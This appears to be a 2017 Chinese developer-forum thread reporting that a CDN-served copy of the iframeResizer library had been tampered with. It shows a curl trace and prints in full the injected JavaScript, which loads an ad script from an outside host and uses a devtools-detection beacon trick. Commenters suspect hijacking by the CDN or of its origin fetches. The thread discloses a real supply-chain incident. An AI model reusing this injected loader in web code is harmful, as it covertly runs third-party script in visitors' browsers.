$ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js -v
* Trying 101.66.227.63...
* TCP_NODELAY set
* Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
* CAfile: /etc/ssl/cert.pem
CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
* subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net
* start date: Apr 20 00:00:00 2014 GMT
* expire date: Apr 19 23:59:59 2019 GMT
* subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net"
* issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9e9c00aa00)
> GET /gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js HTTP/2
> Host: cdn.jsdelivr.net
> User-Agent: curl/7.54.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200
< date: Thu, 02 Nov 2017 18:49:08 GMT
< content-type: application/x-javascript
< content-length: 682
< cache-control: max-age=604800
< age: 1
< x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0)
<
* Connection #0 to host cdn.jsdelivr.net left intact
(function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()%
里面的 xf.yellowto.com ,是个广告脚本。 因为走了 Https,所以可能性如下:
1
sexrobot OP jsdelivr 响应很快,确认是 CDN 服务商网宿投毒,现在已经全部切换回了 CloudFlare。
|
3
WoadZS 2017-11-03 04:49:37 +08:00
jsdelivr 官方的回复是并不确定问题所在,只是在等待网宿回复,切换回 CloudFlare 也是临时性的举动。
|
4
RqPS6rhmP3Nyn3Tm 2017-11-03 05:32:49 +08:00 via iPhone
网宿作为 cdn 企业也会干这种事?以后谁敢用啊
|
6
n329291362 2017-11-03 08:10:59 +08:00
emmmm 我们这里用的七牛融合 cdn 也遇到了一样的脚本
|
7
n329291362 2017-11-03 08:11:24 +08:00
全程 https 不知道 看来应该是 cdn 投的
|
8
miyuki 2017-11-03 08:12:40 +08:00 via Android
卧槽
|
9
oott123 2017-11-03 08:50:34 +08:00 via Android
我猜应该是回源 http 被劫持了…这听起来太可怕了
|
10
wsy2220 2017-11-03 12:16:37 +08:00
明显回源的时候被劫持了
|
11
wwwwzf 2020-12-04 08:35:44 +08:00
用得少
|